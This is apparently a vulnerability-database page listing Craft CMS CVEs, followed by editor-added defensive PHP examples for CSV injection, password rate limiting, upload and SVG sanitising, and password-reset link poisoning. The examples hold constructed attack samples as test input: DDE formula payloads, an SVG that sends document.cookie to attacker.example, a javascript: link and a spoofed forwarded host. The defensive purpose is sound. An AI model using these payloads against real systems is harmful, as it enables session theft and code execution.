VYPR

Packagist (Composer) package

craftcms/cms

pkg:composer/craftcms/cms

Vulnerabilities (98)

  • CVE-2022-29933 (May 9, 2022)
    affected < 3.7.36; fixed 3.7.36

    Craft CMS through 3.7.36 allows a remote unauthenticated attacker, who knows at least one valid username, to reset the account's password and take over the account by providing a crafted HTTP header to the application while using the password reset functionality. Specifically, th

  • CVE-2022-28378 (Apr 3, 2022)
    affected < 3.7.29; fixed 3.7.29

    Craft CMS before 3.7.29 allows XSS.

  • CVE-2021-41824 (Sep 29, 2021)
    affected >= 3.4.0 and < 3.7.14; fixed 3.7.14

    Craft CMS before 3.7.14 allows CSV injection.

  • CVE-2021-27903 (Jun 30, 2021)
    affected < 3.6.7; fixed 3.6.7

    An issue was discovered in Craft CMS before 3.6.7. In some circumstances, a potential Remote Code Execution vulnerability existed on sites that did not restrict administrative changes (if an attacker were somehow able to hijack an administrator's session).

  • CVE-2021-27902 (Jun 30, 2021)
    affected < 3.6.0; fixed 3.6.0

    An issue was discovered in Craft CMS before 3.6.0. In some circumstances, a potential XSS vulnerability existed in connection with front-end forms that accepted user uploads.

  • CVE-2021-32470 (May 7, 2021)
    affected < 3.6.13; fixed 3.6.13

    Craft CMS before 3.6.13 has an XSS vulnerability.

  • CVE-2020-19626 (Mar 26, 2021)
    affected < 3.1.33; fixed 3.1.33

    Cross-site scripting (XSS) vulnerability in Craft CMS 3.1.31 allows remote attackers to inject arbitrary web script or HTML via /admin/settings/sites/new.

  • CVE-2019-15929 (Oct 24, 2019)
    affected < 3.1.7; fixed 3.1.7

    In Craft CMS through 3.1.7, the elevated session password prompt was not rate limited like normal login forms, leaving it open to brute-force attempts.

  • CVE-2019-17496 (Oct 10, 2019)
    affected < 3.3.8; fixed 3.3.8

    Craft CMS before 3.3.8 has stored XSS via a name field. This field is mishandled during site deletion.

  • CVE-2019-12823 (Jun 18, 2019)
    affected < 3.1.31; fixed 3.1.31

    Craft CMS before 3.1.31 does not properly filter XML feeds, allowing XSS.

  • CVE-2018-20465 (Dec 25, 2018)
    affected <= 3.0.34

    Craft CMS through 3.0.34 allows remote authenticated administrators to read sensitive information via server-side template injection, as demonstrated by a {% string for craft.app.config.DB.user and craft.app.config.DB.password in the URI Format of the Site Settings, which causes

  • CVE-2018-20418 (Dec 24, 2018)
    affected <= 3.0.25

    index.php?p=admin/actions/entries/save-entry in Craft CMS 3.0.25 allows XSS by saving a new title from the console tab.

  • CVE-2018-3814 (Jan 1, 2018)
    affected <= 2.6.3000

    Craft CMS 2.6.3000 allows remote attackers to execute arbitrary PHP code by using the "Assets->Upload files" screen and then the "Replace it" option, because this allows a .jpg file to have embedded PHP code, and then be renamed to a .php extension.

  • CVE-2017-9516 (Jun 8, 2017; severity Medium)
    affected < 2.6.2982; fixed 2.6.2982

    Craft CMS before 2.6.2982 allows for a potential XSS attack vector by uploading a malicious SVG file.

  • CVE-2017-8385 (May 1, 2017; severity Medium)
    affected < 2.6.2976; fixed 2.6.2976

    Craft CMS before 2.6.2976 does not prevent modification of the URL in a forgot-password email message.

  • CVE-2017-8384 (May 1, 2017; severity Medium)
    affected < 2.6.2976; fixed 2.6.2976

    Craft CMS before 2.6.2976 allows XSS attacks because the arrays returned by HttpRequestService::getSegments() and getActionSegments() need not be zero-based. NOTE: this vulnerability exists because of an incomplete fix for CVE-2017-8052.

  • CVE-2017-8383 (May 1, 2017; severity Medium)
    affected < 2.6.2976; fixed 2.6.2976

    Craft CMS before 2.6.2976 does not properly restrict viewing the contents of files in the craft/app/ folder.

  • CVE-2017-8052 (Apr 22, 2017; severity Medium)
    affected < 2.6.2974; fixed 2.6.2974

    Craft CMS before 2.6.2974 allows XSS attacks.
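Worked example for CVE-2021-41824 (CSV injection), added by the editor; it is not code from Craft CMS or from this listing. It shows why a cell that begins with =, +, -, @, a tab or a carriage return is dangerous in an exported CSV and one standard way to neutralise such cells. The function names are hypothetical, the rows are constructed sample data, and only PHP standard functions (PHP 7.4 or later) are used.

```php
<?php
declare(strict_types=1);

// Added example, not Craft CMS code: neutralising CSV (formula) injection on export.
// Spreadsheet applications evaluate a cell as a formula when its text starts with
// '=', '+', '-', '@', a tab or a carriage return, so a user-supplied value such as
// an entry title of "=HYPERLINK(...)" runs when an editor opens the exported file.
// The export below prefixes such cells with an apostrophe, the marker that
// spreadsheets understand as "treat this cell as text".

const FORMULA_TRIGGERS = "=+-@\t\r";

function isFormulaLike(string $cell): bool
{
    return $cell !== '' && strpos(FORMULA_TRIGGERS, $cell[0]) !== false;
}

function neutraliseCell(string $cell): string
{
    return isFormulaLike($cell) ? "'" . $cell : $cell;
}

/** @param array<int, array<int, scalar|null>> $rows */
function exportCsv(array $rows): string
{
    $handle = fopen('php://memory', 'r+');
    foreach ($rows as $row) {
        $fields = array_map(fn ($v): string => neutraliseCell((string) $v), $row);
        // Explicit enclosure and an empty escape character: PHP's default "\\" escape
        // is not standard CSV, and newer PHP versions deprecate relying on the default.
        fputcsv($handle, $fields, ',', '"', '');
    }
    rewind($handle);
    $csv = stream_get_contents($handle);
    fclose($handle);
    return $csv;
}

// Constructed sample rows: rows 2 and 3 carry DDE-style payloads in the title
// column; row 4 is a legitimate negative number that the rule also neutralises
// (the known cost of this approach: numeric columns should be exported as
// numbers rather than passed through the text rule).
$rows = [
    ['id', 'title', 'author'],
    [1, 'Welcome post', 'editor'],
    [2, "=cmd|' /C calc'!A0", 'attacker'],
    [3, "@SUM(1+1)*cmd|' /C calc'!A0", 'attacker'],
    [4, '-42', 'editor'],
];
echo exportCsv($rows);
```

The apostrophe stays visible in some spreadsheet applications when the file is imported rather than typed in, which is why the check is applied to free-text columns (titles, names, custom fields) and not to columns the exporter knows to be numeric. The cheaper alternative of rejecting such values at input time does not work for a CMS, where a title legitimately may begin with "+" or "-".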
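Worked example for CVE-2019-15929 (elevated session prompt not rate limited), added by the editor and not Craft's own code. The point of that entry is that every endpoint which checks a password is a login form for throttling purposes, so the example gives the login form and the elevated-session prompt one shared limiter. PasswordAttemptLimiter and verifyPassword are hypothetical names, the walk-through data is constructed, and the code needs PHP 8.1 or later.

```php
<?php
declare(strict_types=1);

// Added example, not Craft CMS code. CVE-2019-15929 is the general lesson that
// every endpoint which checks a password is a login form for throttling
// purposes: the main login, the elevated-session re-authentication prompt and
// any "confirm your password" dialog must share one limiter, keyed on the
// account under attack and the client, not on the endpoint.

final class PasswordAttemptLimiter
{
    /** @var array<string, int[]> timestamps of recent failures per key */
    private array $failures = [];

    public function __construct(
        private readonly int $maxFailures = 5,
        private readonly int $windowSeconds = 300,
    ) {
    }

    private function key(string $username, string $ip): string
    {
        return strtolower($username) . '|' . $ip;
    }

    /** Drops failures older than the window, then reports whether the key is throttled. */
    public function isLocked(string $username, string $ip, int $now): bool
    {
        $k = $this->key($username, $ip);
        $this->failures[$k] = array_values(array_filter(
            $this->failures[$k] ?? [],
            fn (int $t): bool => $t > $now - $this->windowSeconds,
        ));
        return count($this->failures[$k]) >= $this->maxFailures;
    }

    public function recordFailure(string $username, string $ip, int $now): void
    {
        $this->failures[$this->key($username, $ip)][] = $now;
    }

    public function clear(string $username, string $ip): void
    {
        unset($this->failures[$this->key($username, $ip)]);
    }
}

/**
 * Single verification routine for every password prompt. $storedHash is a
 * password_hash() result. While throttled it returns false without running
 * password_verify(), so a brute-force attempt also stops costing hash work.
 */
function verifyPassword(PasswordAttemptLimiter $limiter, string $username, string $ip,
                        string $password, string $storedHash, int $now): bool
{
    if ($limiter->isLocked($username, $ip, $now)) {
        return false;
    }
    if (!password_verify($password, $storedHash)) {
        $limiter->recordFailure($username, $ip, $now);
        return false;
    }
    $limiter->clear($username, $ip);
    return true;
}

// Constructed walk-through (203.0.113.7 is a documentation address): six wrong
// guesses at the elevated-session prompt throttle the account for that client,
// so the correct password is refused until the window has expired.
$limiter = new PasswordAttemptLimiter(maxFailures: 5, windowSeconds: 300);
$hash = password_hash('correct horse battery staple', PASSWORD_DEFAULT);
$t = 1_700_000_000;
for ($i = 0; $i < 6; $i++) {
    verifyPassword($limiter, 'admin', '203.0.113.7', "wrong-$i", $hash, $t + $i);
}
var_dump(verifyPassword($limiter, 'admin', '203.0.113.7', 'correct horse battery staple', $hash, $t + 10));
var_dump(verifyPassword($limiter, 'admin', '203.0.113.7', 'correct horse battery staple', $hash, $t + 400));
```

In a real deployment the failure store lives in the cache or database rather than in memory, so that all web nodes and both prompts see the same counts; the in-memory class only keeps the example self-contained. Keying on the username as well as the IP is what stops a distributed attacker from guessing one account from many addresses.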
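Worked example for CVE-2018-3814 (a .jpg carrying PHP, renamed to .php through "Replace it") and CVE-2017-9516 (XSS via an uploaded SVG), added by the editor; it is not Craft's upload code. It shows two checks: the filename validation that has to run on every path to the filesystem, including rename and replace and not just the initial upload, and a sanitiser that strips active content from SVG. validateTargetFilename and sanitizeSvg are hypothetical names, the inputs are constructed, and the code assumes a local asset volume under the web root, PHP 8.0 or later and ext-dom.

```php
<?php
declare(strict_types=1);

// Added example, not Craft CMS code. CVE-2018-3814 (a .jpg containing PHP,
// later renamed to .php through "Replace it") and CVE-2017-9516 (script inside
// an uploaded SVG) are both upload-path failures. Assumes a local asset volume
// under the web root, the worst case for both. Requires ext-dom.

const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'webp', 'svg', 'pdf'];
// Never a permitted target of an upload, rename or replace, whatever the source file was.
const EXECUTABLE_EXTENSIONS = ['php', 'phtml', 'php3', 'php5', 'php7', 'phps', 'phar',
    'html', 'htm', 'shtml', 'js', 'htaccess'];

/**
 * Every filename that reaches the filesystem goes through here: new uploads,
 * renames and "replace" actions alike. Checking only the original upload is
 * exactly the gap the rename path exploited.
 */
function validateTargetFilename(string $filename): string
{
    if ($filename === '' || preg_match('#[\\\\/\x00-\x1f]#', $filename) === 1) {
        throw new InvalidArgumentException('Path separators and control characters are not allowed');
    }
    // Look at every extension segment: "shell.php.jpg" is executed by some
    // Apache configurations that match ".php" anywhere in the name.
    $segments = array_slice(explode('.', strtolower($filename)), 1);
    if ($segments === []) {
        throw new InvalidArgumentException('A file extension is required');
    }
    foreach ($segments as $segment) {
        if (in_array($segment, EXECUTABLE_EXTENSIONS, true)) {
            throw new InvalidArgumentException("Executable extension .$segment is not permitted");
        }
    }
    $ext = end($segments);
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        throw new InvalidArgumentException("Extension .$ext is not in the allow list");
    }
    return $filename;
}

/**
 * Strips active content from an SVG: <script> and <foreignObject> elements,
 * on* event attributes, and attributes whose value is a javascript:, vbscript:
 * or data:text/html URL (covers href/xlink:href and SMIL "to"/"values").
 */
function sanitizeSvg(string $svg): string
{
    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $ok = $doc->loadXML($svg, LIBXML_NONET);   // no network fetches for DTDs or entities
    libxml_use_internal_errors($previous);
    if (!$ok || $doc->documentElement === null || $doc->documentElement->localName !== 'svg') {
        throw new InvalidArgumentException('Not a well-formed SVG document');
    }

    $xpath = new DOMXPath($doc);
    // local-name() ignores namespace prefixes, so <svg:script> is caught as well.
    $doomed = iterator_to_array($xpath->query("//*[local-name()='script' or local-name()='foreignObject']"), false);
    foreach ($doomed as $node) {
        $node->parentNode->removeChild($node);
    }

    foreach ($xpath->query('//*') as $element) {
        $drop = [];
        foreach ($element->attributes as $attr) {
            $name = strtolower($attr->nodeName);
            // Collapse whitespace and control characters: "java\tscript:" is still javascript: to a browser.
            $value = strtolower(preg_replace('/[\s\x00-\x1f]+/', '', $attr->nodeValue) ?? '');
            if (str_starts_with($name, 'on')
                || str_starts_with($value, 'javascript:')
                || str_starts_with($value, 'vbscript:')
                || str_starts_with($value, 'data:text/html')) {
                $drop[] = $attr;
            }
        }
        foreach ($drop as $attr) {
            $element->removeAttributeNode($attr);
        }
    }
    return $doc->saveXML();
}

// Constructed inputs.
foreach (['photo.jpg', 'shell.php', 'shell.php.jpg', '../shell.jpg', 'logo.svg'] as $name) {
    try {
        printf("accepted %s\n", validateTargetFilename($name));
    } catch (InvalidArgumentException $e) {
        printf("rejected %s: %s\n", $name, $e->getMessage());
    }
}

$malicious = <<<'SVG'
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="java&#9;script:alert(2)"><text x="10" y="20">click</text></a>
  <rect width="10" height="10" fill="green"/>
</svg>
SVG;
echo sanitizeSvg($malicious), "\n";
```

The sanitiser is the second line of defence, not the first: it does not touch CSS url() references or every possible script-bearing attribute, and new vectors appear regularly. The primary controls are serving user uploads from a separate origin (or with Content-Disposition: attachment and a restrictive Content-Security-Policy) and keeping the volume outside the web server's script handlers, so that neither a renamed .php nor an inline script ever runs in the site's origin. Sniffing the file body for a "<?php" marker is a further cheap check for image uploads.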
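Worked example for CVE-2022-29933 (account takeover via a crafted HTTP header during password reset) and CVE-2017-8385 (modifiable URL in the forgot-password email), added by the editor; it is not Craft's code. The 2022 entry names the header as the vector; the classic form of that bug is building the reset link from the request's Host or X-Forwarded-Host header, and the example shows that weak pattern beside one that takes the origin from configuration. resetUrlFromRequest and resetUrlFromConfig are hypothetical names, the $server array stands in for $_SERVER with constructed values, and the code needs PHP 7.4 or later.

```php
<?php
declare(strict_types=1);

// Added example, not Craft CMS code. CVE-2022-29933 ("a crafted HTTP header"
// during password reset) and CVE-2017-8385 (a forgot-password URL that can be
// modified) are two instances of the same failure: the link in the reset email
// is built from request data. Host and X-Forwarded-Host are attacker-chosen on
// the request that triggers the email, so the victim receives a link to the
// attacker's host and hands over the reset token by clicking it.

/** Weak pattern: origin derived from the request. $server stands for $_SERVER. */
function resetUrlFromRequest(array $server, string $token): string
{
    $host = $server['HTTP_X_FORWARDED_HOST'] ?? $server['HTTP_HOST'] ?? 'localhost';
    $scheme = (!empty($server['HTTPS']) && $server['HTTPS'] !== 'off') ? 'https' : 'http';
    return "$scheme://$host/set-password?code=" . rawurlencode($token);
}

/**
 * Hardened pattern: origin taken only from deployment configuration (the
 * equivalent of a configured site URL). The request headers are compared
 * against it purely to log probable poisoning attempts.
 */
function resetUrlFromConfig(string $siteUrl, array $server, string $token, ?callable $log = null): string
{
    $parts = parse_url($siteUrl);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])
        || !in_array($parts['scheme'], ['http', 'https'], true)) {
        throw new RuntimeException('siteUrl must be an absolute http(s) URL');
    }
    $expected = strtolower($parts['host']) . (isset($parts['port']) ? ':' . $parts['port'] : '');
    foreach (['HTTP_X_FORWARDED_HOST', 'HTTP_HOST'] as $header) {
        if ($log !== null && isset($server[$header]) && strtolower($server[$header]) !== $expected) {
            $log(sprintf('password reset with %s=%s, expected %s', $header, $server[$header], $expected));
        }
    }
    return rtrim($siteUrl, '/') . '/set-password?code=' . rawurlencode($token);
}

// Constructed request: the attacker submits the forgot-password form for
// "admin" with a spoofed forwarded host. The token itself is random and bound
// to the account server-side; it is the link's origin that is the problem.
$server = [
    'HTTP_HOST' => 'example.com',
    'HTTP_X_FORWARDED_HOST' => 'attacker.example',
    'HTTPS' => 'on',
];
$token = bin2hex(random_bytes(16));
echo resetUrlFromRequest($server, $token), "\n";
echo resetUrlFromConfig('https://example.com', $server, $token, fn (string $m) => error_log($m)), "\n";
```

Where a reverse proxy legitimately sets X-Forwarded-Host, the framework's trusted-proxy list (in Yii 2, on which Craft is built, the request component's trustedHosts setting) limits which peers may supply it, but a link that never consults the request at all removes the question. The reset token should in addition be single-use and short-lived, which bounds the damage if a poisoned link is ever sent.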

Page 5 of 5